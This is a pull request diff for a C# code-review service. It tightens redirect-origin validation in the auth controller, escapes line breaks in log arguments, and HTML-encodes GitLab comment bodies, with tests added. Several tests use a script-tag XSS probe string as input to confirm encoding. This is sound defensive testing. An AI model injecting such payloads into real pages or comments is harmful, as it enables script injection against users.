### PR TITLE
:bug: fix: harden auth redirects and provider logging

### DIFF
--- a/src/MeisterProPR.Api/Features/IdentityAndAccess/Controllers/TenantAuthController.cs
+++ b/src/MeisterProPR.Api/Features/IdentityAndAccess/Controllers/TenantAuthController.cs
@@ -118,24 +118,15 @@ public sealed class TenantAuthController(
             return this.NotFound();
         }
 
-        if (!Uri.TryCreate(challenge.RedirectUrl, UriKind.Absolute, out var challengeRedirectUri))
+        var challengeRedirectUri = TryResolveAllowedAbsoluteRedirectUri(
+            challenge.RedirectUrl,
+            challenge.AllowedRedirectOrigin);
+        if (challengeRedirectUri is null)
         {
             return this.NotFound();
         }
 
-        if (!string.Equals(challengeRedirectUri.Scheme, Uri.UriSchemeHttp, StringComparison.OrdinalIgnoreCase)
-            && !string.Equals(challengeRedirectUri.Scheme, Uri.UriSchemeHttps, StringComparison.OrdinalIgnoreCase))
-        {
-            return this.NotFound();
-        }
-
-        var challengeRedirectOrigin = challengeRedirectUri.GetLeftPart(UriPartial.Authority);
-        if (!string.Equals(challengeRedirectOrigin, challenge.AllowedRedirectOrigin, StringComparison.OrdinalIgnoreCase))
-        {
-            return this.NotFound();
-        }
-
-        return this.Redirect(challengeRedirectUri.ToString());
+        return this.RedirectToValidatedAbsoluteUri(challengeRedirectUri);
     }
 
     /// <summary>Completes tenant-scoped external sign-in and returns the shared application session payload.</summary>
@@ -175,26 +166,16 @@ public sealed class TenantAuthController(
 
             var failureCode = completion.FailureCode ?? "external_identity_rejected";
             var failureMessage = completion.FailureMessage ?? "External identity rejected by tenant policy.";
-            var failedRedirectUrl = this.TryBuildFrontendCallbackRedirectUrl(
+            var failedRedirectUri = this.TryBuildFrontendCallbackRedirectUri(
                 completion.FrontendReturnUrl,
                 new Dictionary<string, string?>
                 {
                     ["error"] = failureCode,
                     ["message"] = failureMessage,
                 });
-            if (failedRedirectUrl is not null
-                && Uri.TryCreate(failedRedirectUrl, UriKind.Absolute, out var failedRedirectUri)
-                && (string.Equals(failedRedirectUri.Scheme, Uri.UriSchemeHttp, StringComparison.OrdinalIgnoreCase)
-                    || string.Equals(failedRedirectUri.Scheme, Uri.UriSchemeHttps, StringComparison.OrdinalIgnoreCase)))
+            if (failedRedirectUri is not null)
             {
-                var allowedOrigins = BrowserOriginPolicy.GetAllowedOrigins(configuration);
-                var failedRedirectOrigin = failedRedirectUri.GetLeftPart(UriPartial.Authority);
-                if (allowedOrigins.Contains(failedRedirectOrigin, StringComparer.OrdinalIgnoreCase)
-                    || failedRedirectUri.Host.EndsWith(".visualstudio.com", StringComparison.OrdinalIgnoreCase)
-                    || failedRedirectUri.Host.EndsWith(".gallerycdn.vsassets.io", StringComparison.OrdinalIgnoreCase))
-                {
-                    return this.Redirect(failedRedirectUri.ToString());
-                }
+                return this.RedirectToValidatedAbsoluteUri(failedRedirectUri);
             }
 
             return this.Unauthorized(new { error = failureCode, message = failureMessage });
@@ -202,7 +183,7 @@ public sealed class TenantAuthController(
 
         var session = await sessionFactory.CreateAsync(completion.User, ct);
         var sessionDto = AuthHelpers.ToTenantAuthSessionDto(session);
-        var successfulRedirectUrl = this.TryBuildFrontendCallbackRedirectUrl(
+        var successfulRedirectUri = this.TryBuildFrontendCallbackRedirectUri(
             completion.FrontendReturnUrl,
             new Dictionary<string, string?>
             {
@@ -211,19 +192,9 @@ public sealed class TenantAuthController(
                 ["expiresIn"] = sessionDto.ExpiresIn.ToString(CultureInfo.InvariantCulture),
                 ["tokenType"] = sessionDto.TokenType,
             });
-        if (successfulRedirectUrl is not null
-            && Uri.TryCreate(successfulRedirectUrl, UriKind.Absolute, out var successfulRedirectUri)
-            && (string.Equals(successfulRedirectUri.Scheme, Uri.UriSchemeHttp, StringComparison.OrdinalIgnoreCase)
-                || string.Equals(successfulRedirectUri.Scheme, Uri.UriSchemeHttps, StringComparison.OrdinalIgnoreCase)))
+        if (successfulRedirectUri is not null)
         {
-            var allowedOrigins = BrowserOriginPolicy.GetAllowedOrigins(configuration);
-            var successfulRedirectOrigin = successfulRedirectUri.GetLeftPart(UriPartial.Authority);
-            if (allowedOrigins.Contains(successfulRedirectOrigin, StringComparer.OrdinalIgnoreCase)
-                || successfulRedirectUri.Host.EndsWith(".visualstudio.com", StringComparison.OrdinalIgnoreCase)
-                || successfulRedirectUri.Host.EndsWith(".gallerycdn.vsassets.io", StringComparison.OrdinalIgnoreCase))
-            {
-                return this.Redirect(successfulRedirectUri.ToString());
-            }
+            return this.RedirectToValidatedAbsoluteUri(successfulRedirectUri);
         }
 
         return this.Ok(sessionDto);
@@ -234,6 +205,31 @@ public sealed class TenantAuthController(
         return PublicApplicationUrlResolver.GetApplicationBaseUri(this.Request, configuration);
     }
 
+    private IActionResult RedirectToValidatedAbsoluteUri(Uri redirectUri)
+    {
+        this.Response.StatusCode = StatusCodes.Status302Found;
+        this.Response.Headers.Location = redirectUri.AbsoluteUri;
+        return new EmptyResult();
+    }
+
+    private static Uri? TryResolveAllowedAbsoluteRedirectUri(string? redirectUrl, string allowedOrigin)
+    {
+        if (!Uri.TryCreate(redirectUrl, UriKind.Absolute, out var redirectUri))
+        {
+            return null;
+        }
+
+        if (!IsSupportedRedirectScheme(redirectUri))
+        {
+            return null;
+        }
+
+        var redirectOrigin = redirectUri.GetLeftPart(UriPartial.Authority);
+        return string.Equals(redirectOrigin, allowedOrigin, StringComparison.OrdinalIgnoreCase)
+            ? redirectUri
+            : null;
+    }
+
     private Uri? TryResolveFrontendReturnUrl(string? returnUrl)
     {
         if (!Uri.TryCreate(returnUrl, UriKind.Absolute, out var returnUri))
@@ -241,19 +237,12 @@ public sealed class TenantAuthController(
             return null;
         }
 
-        if (!string.Equals(returnUri.Scheme, Uri.UriSchemeHttp, StringComparison.OrdinalIgnoreCase)
-            && !string.Equals(returnUri.Scheme, Uri.UriSchemeHttps, StringComparison.OrdinalIgnoreCase))
-        {
-            return null;
-        }
-
-        var origin = returnUri.GetLeftPart(UriPartial.Authority);
-        return BrowserOriginPolicy.IsAllowedOrigin(origin, configuration)
+        return this.IsAllowedBrowserRedirectUri(returnUri)
             ? returnUri
             : null;
     }
 
-    private string? TryBuildFrontendCallbackRedirectUrl(
+    private Uri? TryBuildFrontendCallbackRedirectUri(
         string? frontendReturnUrl,
         IReadOnlyDictionary<string, string?> fragmentValues)
     {
@@ -262,14 +251,7 @@ public sealed class TenantAuthController(
             return null;
         }
 
-        if (!string.Equals(returnUri.Scheme, Uri.UriSchemeHttp, StringComparison.OrdinalIgnoreCase)
-            && !string.Equals(returnUri.Scheme, Uri.UriSchemeHttps, StringComparison.OrdinalIgnoreCase))
-        {
-            return null;
-        }
-
-        var origin = returnUri.GetLeftPart(UriPartial.Authority);
-        if (!BrowserOriginPolicy.IsAllowedOrigin(origin, configuration))
+        if (!this.IsAllowedBrowserRedirectUri(returnUri))
         {
             return null;
         }
@@ -285,7 +267,24 @@ public sealed class TenantAuthController(
             Fragment = fragment,
         };
 
-        return builder.Uri.ToString();
+        return builder.Uri;
+    }
+
+    private bool IsAllowedBrowserRedirectUri(Uri redirectUri)
+    {
+        if (!IsSupportedRedirectScheme(redirectUri))
+        {
+            return false;
+        }
+
+        var origin = redirectUri.GetLeftPart(UriPartial.Authority);
+        return BrowserOriginPolicy.IsAllowedOrigin(origin, configuration);
+    }
+
+    private static bool IsSupportedRedirectScheme(Uri redirectUri)
+    {
+        return string.Equals(redirectUri.Scheme, Uri.UriSchemeHttp, StringComparison.OrdinalIgnoreCase)
+               || string.Equals(redirectUri.Scheme, Uri.UriSchemeHttps, StringComparison.OrdinalIgnoreCase);
     }
 }
 

--- a/src/MeisterProPR.Infrastructure/Features/Clients/Persistence/DbClientRegistry.cs
+++ b/src/MeisterProPR.Infrastructure/Features/Clients/Persistence/DbClientRegistry.cs
@@ -82,11 +82,12 @@ public sealed class DbClientRegistry(
         }
         catch (Exception ex)
         {
+            var safeHostBaseUrl = host.HostBaseUrl.Replace("\r", "\\r").Replace("\n", "\\n").Replace("\t", "\\t");
             this._logger.LogWarning(
                 ex,
                 "Failed to derive GitHub App reviewer identity for client {ClientId} on host {HostBaseUrl}; continuing without fallback reviewer identity.",
                 clientId,
-                host.HostBaseUrl);
+                safeHostBaseUrl);
             return null;
         }
     }

--- a/src/MeisterProPR.Infrastructure/Features/Providers/GitHub/Reviewing/GitHubCodeReviewQueryService.cs
+++ b/src/MeisterProPR.Infrastructure/Features/Providers/GitHub/Reviewing/GitHubCodeReviewQueryService.cs
@@ -46,12 +46,14 @@ internal sealed class GitHubCodeReviewQueryService(
         if (response.StatusCode is HttpStatusCode.Forbidden or HttpStatusCode.Unauthorized)
         {
             var detail = await ReadDiagnosticBodyAsync(response, ct);
+            var safeRepositoryPath = BuildRepositoryPath(review.Repository).Replace("\r", "\\r").Replace("\n", "\\n").Replace("\t", "\\t");
+            var safeDetail = (detail ?? string.Empty).Replace("\r", "\\r").Replace("\n", "\\n").Replace("\t", "\\t");
             this._logger.LogWarning(
                 "GitHub review query permission failure for repository {RepositoryPath} review {ReviewNumber} with status {StatusCode}. Detail: {Detail}",
-                BuildRepositoryPath(review.Repository),
+                safeRepositoryPath,
                 review.Number,
                 (int)response.StatusCode,
-                detail);
+                safeDetail);
             throw new InvalidOperationException(
                 string.IsNullOrWhiteSpace(detail)
                     ? "GitHub review query failed because the configured credential no longer has permission to access this pull request."

--- a/src/MeisterProPR.Infrastructure/Features/Providers/GitHub/Reviewing/GitHubLifecyclePublicationService.cs
+++ b/src/MeisterProPR.Infrastructure/Features/Providers/GitHub/Reviewing/GitHubLifecyclePublicationService.cs
@@ -55,12 +55,14 @@ internal sealed class GitHubLifecyclePublicationService(
         if (response.StatusCode is HttpStatusCode.Unauthorized or HttpStatusCode.Forbidden)
         {
             var responseBody = await ReadDiagnosticBodyAsync(response, ct);
+            var safeRepositoryPath = BuildRepositoryPath(review.Repository).Replace("\r", "\\r").Replace("\n", "\\n").Replace("\t", "\\t");
+            var safeResponseBody = (responseBody ?? string.Empty).Replace("\r", "\\r").Replace("\n", "\\n").Replace("\t", "\\t");
             this._logger.LogWarning(
                 "GitHub review publication permission failure for repository {RepositoryPath} review {ReviewNumber} with status {StatusCode}. Detail: {Detail}",
-                BuildRepositoryPath(review.Repository),
+                safeRepositoryPath,
                 review.Number,
                 (int)response.StatusCode,
-                responseBody);
+                safeResponseBody);
             throw new InvalidOperationException(
                 string.IsNullOrWhiteSpace(responseBody)
                     ? "GitHub review publication failed because the configured credential no longer has permission to publish review comments."

--- a/src/MeisterProPR.Infrastructure/Features/Providers/GitHub/Security/GitHubAuthenticationService.cs
+++ b/src/MeisterProPR.Infrastructure/Features/Providers/GitHub/Security/GitHubAuthenticationService.cs
@@ -58,11 +58,12 @@ internal sealed class GitHubAuthenticationService
         ValidateAppInstallationConnection(connection);
 
         var installationId = connection.GitHubAppInstallationId!.Value.ToString(CultureInfo.InvariantCulture);
+        var safeHostBaseUrl = host.HostBaseUrl.Replace("\r", "\\r").Replace("\n", "\\n").Replace("\t", "\\t");
         this._logger.LogDebug(
             "Looking up GitHub App installation {InstallationId} for connection {ConnectionId} on host {HostBaseUrl}.",
             installationId,
             connection.Id,
-            host.HostBaseUrl);
+            safeHostBaseUrl);
         var appJwt = CreateAppJwt(connection);
         using var request = GitHubConnectionVerifier.CreateAuthenticatedRequest(
             GitHubConnectionVerifier.BuildApiUri(host, $"/app/installations/{installationId}"),
@@ -72,12 +73,13 @@ internal sealed class GitHubAuthenticationService
         if (response.StatusCode is HttpStatusCode.Unauthorized or HttpStatusCode.Forbidden)
         {
             var detail = await ReadResponseMessageAsync(response, ct);
+            var safeDetail = (detail ?? string.Empty).Replace("\r", "\\r").Replace("\n", "\\n").Replace("\t", "\\t");
             this._logger.LogWarning(
                 "GitHub App installation lookup failed for connection {ConnectionId} on host {HostBaseUrl} with status {StatusCode}. Detail: {Detail}",
                 connection.Id,
-                host.HostBaseUrl,
+                safeHostBaseUrl,
                 (int)response.StatusCode,
-                detail);
+                safeDetail);
             throw new InvalidOperationException(
                 BuildMessage(
                     "GitHub App authentication failed.",
@@ -90,7 +92,7 @@ internal sealed class GitHubAuthenticationService
                 "GitHub App installation {InstallationId} was not found for connection {ConnectionId} on host {HostBaseUrl}.",
                 installationId,
                 connection.Id,
-                host.HostBaseUrl);
+                safeHostBaseUrl);
             throw new InvalidOperationException("GitHub App installation was not found or is not accessible.");
         }
 
@@ -99,7 +101,7 @@ internal sealed class GitHubAuthenticationService
             this._logger.LogWarning(
                 "GitHub App installation lookup failed for connection {ConnectionId} on host {HostBaseUrl} with status {StatusCode}.",
                 connection.Id,
-                host.HostBaseUrl,
+                safeHostBaseUrl,
                 (int)response.StatusCode);
             throw new InvalidOperationException(
                 await BuildStatusMessageAsync("GitHub App installation lookup failed", response, ct));
@@ -119,7 +121,7 @@ internal sealed class GitHubAuthenticationService
             "GitHub App installation {InstallationId} resolved for connection {ConnectionId} as account {AccountLogin}.",
             installationId,
             connection.Id,
-            payload.Account.Login.Trim());
+            payload.Account.Login.Trim().Replace("\r", "\\r").Replace("\n", "\\n").Replace("\t", "\\t"));
 
         return new GitHubInstallationMetadata(
             payload.Account.Login.Trim(),
@@ -171,6 +173,7 @@ internal sealed class GitHubAuthenticationService
         }
 
         var installationId = connection.GitHubAppInstallationId!.Value.ToString(CultureInfo.InvariantCulture);
+        var safeHostBaseUrl = host.HostBaseUrl.Replace("\r", "\\r").Replace("\n", "\\n").Replace("\t", "\\t");
         this._logger.LogDebug(
             "Minting GitHub App installation token for installation {InstallationId} on connection {ConnectionId}.",
             installationId,
@@ -185,12 +188,13 @@ internal sealed class GitHubAuthenticationService
         if (response.StatusCode is HttpStatusCode.Unauthorized or HttpStatusCode.Forbidden)
         {
             var detail = await ReadResponseMessageAsync(response, ct);
+            var safeDetail = (detail ?? string.Empty).Replace("\r", "\\r").Replace("\n", "\\n").Replace("\t", "\\t");
             this._logger.LogWarning(
                 "GitHub App installation token request failed for connection {ConnectionId} on host {HostBaseUrl} with status {StatusCode}. Detail: {Detail}",
                 connection.Id,
-                host.HostBaseUrl,
+                safeHostBaseUrl,
                 (int)response.StatusCode,
-                detail);
+                safeDetail);
             throw new InvalidOperationException(
                 BuildMessage(
                     "GitHub App installation token request failed.",
@@ -211,7 +215,7 @@ internal sealed class GitHubAuthenticationService
             this._logger.LogWarning(
                 "GitHub App installation token request failed for connection {ConnectionId} on host {HostBaseUrl} with status {StatusCode}.",
                 connection.Id,
-                host.HostBaseUrl,
+                safeHostBaseUrl,
                 (int)response.StatusCode);
             throw new InvalidOperationException(
                 await BuildStatusMessageAsync("GitHub App installation token request failed", response, ct));

--- a/src/MeisterProPR.Infrastructure/Features/Providers/GitHub/Security/GitHubConnectionVerifier.cs
+++ b/src/MeisterProPR.Infrastructure/Features/Providers/GitHub/Security/GitHubConnectionVerifier.cs
@@ -55,13 +55,14 @@ internal sealed class GitHubConnectionVerifier(
             BuildApiUri(host, "/user"),
             await this._authenticationService.GetAccessTokenAsync(host, connection, ct));
         using var response = await httpClientFactory.CreateClient("GitHubProvider").SendAsync(request, ct);
+        var safeHostBaseUrl = host.HostBaseUrl.Replace("\r", "\\r").Replace("\n", "\\n").Replace("\t", "\\t");
 
         if (response.StatusCode is HttpStatusCode.Unauthorized or HttpStatusCode.Forbidden)
         {
             this._logger.LogWarning(
                 "GitHub PAT verification failed for connection {ConnectionId} on host {HostBaseUrl} with status {StatusCode}.",
                 connection.Id,
-                host.HostBaseUrl,
+                safeHostBaseUrl,
                 (int)response.StatusCode);
             throw new InvalidOperationException("GitHub connection authentication failed.");
         }
@@ -71,7 +72,7 @@ internal sealed class GitHubConnectionVerifier(
             this._logger.LogWarning(
                 "GitHub PAT verification failed for connection {ConnectionId} on host {HostBaseUrl} with status {StatusCode}.",
                 connection.Id,
-                host.HostBaseUrl,
+                safeHostBaseUrl,
                 (int)response.StatusCode);
             throw new InvalidOperationException($"GitHub connection verification failed with status {(int)response.StatusCode}.");
         }
@@ -85,8 +86,8 @@ internal sealed class GitHubConnectionVerifier(
         this._logger.LogDebug(
             "GitHub PAT verification succeeded for connection {ConnectionId} on host {HostBaseUrl} as {AuthenticatedLogin}.",
             connection.Id,
-            host.HostBaseUrl,
-            user.Login.Trim());
+            safeHostBaseUrl,
+            user.Login.Trim().Replace("\r", "\\r").Replace("\n", "\\n").Replace("\t", "\\t"));
         return new GitHubConnectionContext(
             connection,
             user.Login.Trim(),
@@ -102,11 +103,12 @@ internal sealed class GitHubConnectionVerifier(
     {
         var installation = await this._authenticationService.GetInstallationMetadataAsync(host, connection, ct);
         _ = await this._authenticationService.GetAccessTokenAsync(host, connection, ct);
+        var safeHostBaseUrl = host.HostBaseUrl.Replace("\r", "\\r").Replace("\n", "\\n").Replace("\t", "\\t");
         this._logger.LogDebug(
             "GitHub App verification succeeded for connection {ConnectionId} on host {HostBaseUrl} as installation account {AuthenticatedLogin}.",
             connection.Id,
-            host.HostBaseUrl,
-            installation.AccountLogin);
+            safeHostBaseUrl,
+            installation.AccountLogin.Replace("\r", "\\r").Replace("\n", "\\n").Replace("\t", "\\t"));
         var authenticatedActorLogin = string.IsNullOrWhiteSpace(installation.AppSlug)
             ? installation.AccountLogin
             : installation.AppSlug.Trim() + "[bot]";

--- a/src/MeisterProPR.Infrastructure/Features/Providers/GitLab/Reviewing/GitLabCodeReviewPublicationService.cs
+++ b/src/MeisterProPR.Infrastructure/Features/Providers/GitLab/Reviewing/GitLabCodeReviewPublicationService.cs
@@ -11,6 +11,7 @@ using MeisterProPR.Application.Interfaces;
 using MeisterProPR.Domain.Enums;
 using MeisterProPR.Domain.ValueObjects;
 using MeisterProPR.Infrastructure.Features.Providers.GitLab.Security;
+using MeisterProPR.Infrastructure.Utilities;
 
 namespace MeisterProPR.Infrastructure.Features.Providers.GitLab.Reviewing;
 
@@ -172,7 +173,7 @@ internal sealed class GitLabCodeReviewPublicationService(
     private static HttpContent BuildDiscussionContent(GitLabDiscussionRequest payload)
     {
         var content = new MultipartFormDataContent();
-        content.Add(new StringContent(payload.Body), "body");
+        content.Add(new StringContent(HtmlSanitizer.Sanitize(payload.Body)), "body");
 
         if (payload.Position is not null)
         {

--- a/src/MeisterProPR.Infrastructure/Utilities/HtmlSanitizer.cs
+++ b/src/MeisterProPR.Infrastructure/Utilities/HtmlSanitizer.cs
@@ -1,22 +1,21 @@
 // Copyright (c) Andreas Rain.
 // Licensed under the Elastic License 2.0. See LICENSE file in the project root for full license terms.
 
+using System.Net;
 using System.Text;
 
 namespace MeisterProPR.Infrastructure.Utilities;
 
 /// <summary>
-///     Sanitizes text content to prevent HTML injection in Azure DevOps comments.
-///     Escapes dangerous HTML characters while preserving markdown formatting.
+///     Sanitizes text content to prevent HTML injection in rendered review comments.
+///     Uses the built-in HTML encoder so unsafe HTML characters are escaped consistently.
 /// </summary>
 internal static class HtmlSanitizer
 {
     /// <summary>
-    ///     Sanitizes the given text by escaping HTML metacharacters that could be interpreted
-    ///     as HTML tags. This prevents tags like &lt;style&gt;, &lt;script&gt;, and other
-    ///     HTML elements from being rendered in Azure DevOps comments.
-    ///     Markdown formatting (bold, italic, code fences, etc.) is preserved since
-    ///     they do not use angle brackets. Content inside markdown code blocks is also protected.
+    ///     Sanitizes the given text with the framework HTML encoder before it is rendered.
+    ///     This prevents tags like &lt;style&gt;, &lt;script&gt;, and other HTML fragments from
+    ///     being interpreted by downstream renderers.
     /// </summary>
     /// <param name="input">The text to sanitize. Can be null or empty.</param>
     /// <returns>The sanitized text with HTML metacharacters escaped.</returns>
@@ -27,14 +26,7 @@ internal static class HtmlSanitizer
             return input ?? string.Empty;
         }
 
-        // Escape < and > to prevent HTML injection.
-        // This is safe because:
-        // 1. Markdown formatting doesn't require angle brackets (**, *, `, [text](url), etc.)
-        // 2. Code blocks use backticks (```), not angle brackets
-        // 3. Azure DevOps will ignore escaped angle brackets in markdown
-        return input
-            .Replace("<", "&lt;", StringComparison.Ordinal)
-            .Replace(">", "&gt;", StringComparison.Ordinal);
+        return WebUtility.HtmlEncode(input);
     }
 
     /// <summary>
@@ -49,9 +41,7 @@ internal static class HtmlSanitizer
             throw new ArgumentNullException(nameof(builder));
         }
 
-        // Replace in reverse order to avoid offset issues.
-        // First replace > (no offset change), then < (no offset change).
-        builder.Replace(">", "&gt;");
-        builder.Replace("<", "&lt;");
+        var encoded = WebUtility.HtmlEncode(builder.ToString());
+        builder.Clear().Append(encoded);
     }
 }

--- a/src/MeisterProPR.ProCursor/Application/Services/ProCursorMiniIndexBuilder.cs
+++ b/src/MeisterProPR.ProCursor/Application/Services/ProCursorMiniIndexBuilder.cs
@@ -42,10 +42,11 @@ public sealed class ProCursorMiniIndexBuilder(
         var source = await this.ResolveSourceAsync(request, ct);
         if (source is null)
         {
+            var safeRepositoryId = request.ReviewContext.RepositoryId.Replace("\r", "\\r").Replace("\n", "\\n").Replace("\t", "\\t");
             logger.LogInformation(
                 "ProCursor mini-index overlay unavailable for client {ClientId}: no matching repository source found for {RepositoryId}.",
                 request.ClientId,
-                request.ReviewContext.RepositoryId);
+                safeRepositoryId);
             return null;
         }
 

--- a/tests/MeisterProPR.Api.Tests/IdentityAndAccess/TenantAuthControllerTests.cs
+++ b/tests/MeisterProPR.Api.Tests/IdentityAndAccess/TenantAuthControllerTests.cs
@@ -259,6 +259,72 @@ public sealed class TenantAuthControllerTests(TenantAdministrationApiFactory fac
     }
 
     [Fact]
+    public async Task ExternalCallback_WithAllowedFrontendReturnUrl_RedirectsToFrontendWithSessionFragment()
+    {
+        factory.ResetLicensing();
+        factory.ResetExternalAuthResponses();
+
+        var tenantSlug = $"acme-{Guid.NewGuid():N}";
+        var emailLocalPart = $"return.user.{Guid.NewGuid():N}";
+        var email = $"{emailLocalPart}@acme.test";
+        var tenantId = await factory.SeedTenantAsync(tenantSlug, "Acme Corp");
+        const string clientId = "entra-client-id";
+        var providerId = await factory.SeedSsoProviderAsync(
+            tenantId,
+            "Acme Entra",
+            issuerOrAuthorityUrl: "https://login.microsoftonline.com/common/v2.0",
+            clientId: clientId,
+            scopes: ["openid", "profile", "email"]);
+
+        using var client = CreateNonRedirectingClient(factory);
+        const string returnUrl = "http://localhost:5173/auth/callback";
+        var challengeResponse = await client.GetAsync(
+            $"/auth/external/challenge/{tenantSlug}/{providerId}?returnUrl={Uri.EscapeDataString(returnUrl)}");
+
+        Assert.Equal(HttpStatusCode.Found, challengeResponse.StatusCode);
+        var challengeLocation = challengeResponse.Headers.Location;
+        Assert.NotNull(challengeLocation);
+        var challengeQuery = QueryHelpers.ParseQuery(challengeLocation.Query);
+        var state = GetSingleQueryValue(challengeQuery, "state");
+        var expectedCallbackUri = BuildExpectedCallbackUri(client.BaseAddress!, tenantSlug);
+
+        factory.QueueExternalAuthResponse(request =>
+        {
+            Assert.Equal(HttpMethod.Post, request.Method);
+            Assert.Equal("https://login.microsoftonline.com/common/oauth2/v2.0/token", request.RequestUri?.ToString());
+            var body = request.Content?.ReadAsStringAsync().GetAwaiter().GetResult() ?? string.Empty;
+            Assert.Contains($"code={Uri.EscapeDataString("entra-code-return-url")}", body, StringComparison.Ordinal);
+            Assert.Contains($"redirect_uri={Uri.EscapeDataString(expectedCallbackUri)}", body, StringComparison.Ordinal);
+
+            return CreateJsonResponse(
+                new
+                {
+                    id_token = CreateOidcIdToken(
+                        "https://login.microsoftonline.com/common/v2.0",
+                        clientId,
+                        "entra-user-return-url",
+                        email,
+                        true,
+                        "Return User"),
+                });
+        });
+
+        var callbackResponse = await client.GetAsync(
+            $"/auth/external/callback/{tenantSlug}?code=entra-code-return-url&state={Uri.EscapeDataString(state)}");
+
+        Assert.Equal(HttpStatusCode.Found, callbackResponse.StatusCode);
+        var location = callbackResponse.Headers.Location;
+        Assert.NotNull(location);
+        Assert.Equal("http://localhost:5173", location.GetLeftPart(UriPartial.Authority));
+        Assert.Equal("/auth/callback", location.AbsolutePath);
+
+        var fragment = QueryHelpers.ParseQuery("?" + location.Fragment.TrimStart('#'));
+        Assert.False(string.IsNullOrWhiteSpace(GetSingleQueryValue(fragment, "accessToken")));
+        Assert.False(string.IsNullOrWhiteSpace(GetSingleQueryValue(fragment, "refreshToken")));
+        Assert.Equal("Bearer", GetSingleQueryValue(fragment, "tokenType"));
+    }
+
+    [Fact]
     public async Task ExternalCallback_WithVerifiedAllowedEmail_AutoCreatesUserMembershipAndIdentity()
     {
         factory.ResetLicensing();

--- a/tests/MeisterProPR.Infrastructure.Tests/GitLab/GitLabProviderAdapterTests.cs
+++ b/tests/MeisterProPR.Infrastructure.Tests/GitLab/GitLabProviderAdapterTests.cs
@@ -614,6 +614,65 @@ public sealed class GitLabCodeReviewPublicationServiceTests
     }
 
     [Fact]
+    public async Task PublishReviewAsync_HtmlEncodesDiscussionBodiesBeforePosting()
+    {
+        var clientId = Guid.NewGuid();
+        var host = new ProviderHostRef(ScmProvider.GitLab, "https://gitlab.example.com");
+        var repository = new RepositoryRef(host, "101", "acme/platform", "acme/platform/propr");
+        var review = new CodeReviewRef(repository, CodeReviewPlatformKind.PullRequest, "4201", 42);
+        var revision = new ReviewRevision("head-sha", "base-sha", "start-sha", "head-sha", "base-sha...head-sha");
+        var reviewer = new ReviewerIdentity(host, "99", "meister-review-bot", "Meister Review Bot", true);
+        var result = new ReviewResult(
+            "Summary with <script>alert('xss')</script>",
+            [new ReviewComment("src/file.ts", 18, CommentSeverity.Warning, "Guard <b>this</b> null case.")]);
+        var connectionRepository = GitLabTestHelpers.CreateConnectionRepository(clientId, host);
+
+        var postedBodies = new List<string>();
+        var httpClientFactory = GitLabTestHelpers.CreateHttpClientFactory(async request =>
+        {
+            if (request.RequestUri!.AbsoluteUri == "https://gitlab.example.com/api/v4/user")
+            {
+                return GitLabTestHelpers.CreateJsonResponse(new { username = "meister-dev" });
+            }
+
+            if (request.Method == HttpMethod.Get && request.RequestUri.AbsoluteUri ==
+                "https://gitlab.example.com/api/v4/projects/101/merge_requests/42/versions")
+            {
+                return GitLabTestHelpers.CreateJsonResponse(
+                    new object[]
+                    {
+                        new
+                        {
+                            id = 7, base_commit_sha = "latest-base-sha", head_commit_sha = "latest-head-sha",
+                            start_commit_sha = "latest-start-sha",
+                        },
+                    });
+            }
+
+            if (request.Method == HttpMethod.Post && request.RequestUri.AbsoluteUri ==
+                "https://gitlab.example.com/api/v4/projects/101/merge_requests/42/discussions")
+            {
+                postedBodies.Add(await request.Content!.ReadAsStringAsync());
+                return GitLabTestHelpers.CreateJsonResponse(new { id = "discussion-1" }, HttpStatusCode.Created);
+            }
+
+            return new HttpResponseMessage(HttpStatusCode.NotFound);
+        });
+
+        var sut = new GitLabCodeReviewPublicationService(
+            new GitLabConnectionVerifier(connectionRepository, httpClientFactory),
+            httpClientFactory);
+
+        await sut.PublishReviewAsync(clientId, review, revision, result, reviewer);
+
+        Assert.Equal(2, postedBodies.Count);
+        Assert.Contains("&lt;script&gt;alert('xss')&lt;/script&gt;", postedBodies[0], StringComparison.Ordinal);
+        Assert.DoesNotContain("<script>alert('xss')</script>", postedBodies[0], StringComparison.Ordinal);
+        Assert.Contains("Guard &lt;b&gt;this&lt;/b&gt; null case.", postedBodies[1], StringComparison.Ordinal);
+        Assert.DoesNotContain("Guard <b>this</b> null case.", postedBodies[1], StringComparison.Ordinal);
+    }
+
+    [Fact]
     public async Task PublishReviewAsync_WithForbiddenResponse_ThrowsScopeAwareMessage()
     {
         var clientId = Guid.NewGuid();

--- a/tests/MeisterProPR.Infrastructure.Tests/GitLab/GitLabProviderAdapterTests.cs
+++ b/tests/MeisterProPR.Infrastructure.Tests/GitLab/GitLabProviderAdapterTests.cs
@@ -666,7 +666,7 @@ public sealed class GitLabCodeReviewPublicationServiceTests
         await sut.PublishReviewAsync(clientId, review, revision, result, reviewer);
 
         Assert.Equal(2, postedBodies.Count);
-        Assert.Contains("&lt;script&gt;alert('xss')&lt;/script&gt;", postedBodies[0], StringComparison.Ordinal);
+        Assert.Contains("&lt;script&gt;alert(&#39;xss&#39;)&lt;/script&gt;", postedBodies[0], StringComparison.Ordinal);
         Assert.DoesNotContain("<script>alert('xss')</script>", postedBodies[0], StringComparison.Ordinal);
         Assert.Contains("Guard &lt;b&gt;this&lt;/b&gt; null case.", postedBodies[1], StringComparison.Ordinal);
         Assert.DoesNotContain("Guard <b>this</b> null case.", postedBodies[1], StringComparison.Ordinal);

--- a/tests/MeisterProPR.Infrastructure.Tests/Utilities/HtmlSanitizerTests.cs
+++ b/tests/MeisterProPR.Infrastructure.Tests/Utilities/HtmlSanitizerTests.cs
@@ -47,7 +47,7 @@ public class HtmlSanitizerTests
     {
         const string input = "<script>alert('xss')</script>";
         var result = HtmlSanitizer.Sanitize(input);
-        Assert.Equal("&lt;script&gt;alert('xss')&lt;/script&gt;", result);
+        Assert.Equal("&lt;script&gt;alert(&#39;xss&#39;)&lt;/script&gt;", result);
     }
 
     [Fact]
@@ -55,7 +55,7 @@ public class HtmlSanitizerTests
     {
         const string input = "<div class='danger'>Content</div>";
         var result = HtmlSanitizer.Sanitize(input);
-        Assert.Equal("&lt;div class='danger'&gt;Content&lt;/div&gt;", result);
+        Assert.Equal("&lt;div class=&#39;danger&#39;&gt;Content&lt;/div&gt;", result);
     }
 
     [Fact]
@@ -130,8 +130,7 @@ public class HtmlSanitizerTests
     {
         const string input = "if (x > 5 && y < 10) { }";
         var result = HtmlSanitizer.Sanitize(input);
-        // HtmlSanitizer only escapes < and > to prevent HTML injection, not other characters
-        Assert.Equal("if (x &gt; 5 && y &lt; 10) { }", result);
+        Assert.Equal("if (x &gt; 5 &amp;&amp; y &lt; 10) { }", result);
     }
 
     [Fact]
@@ -139,7 +138,7 @@ public class HtmlSanitizerTests
     {
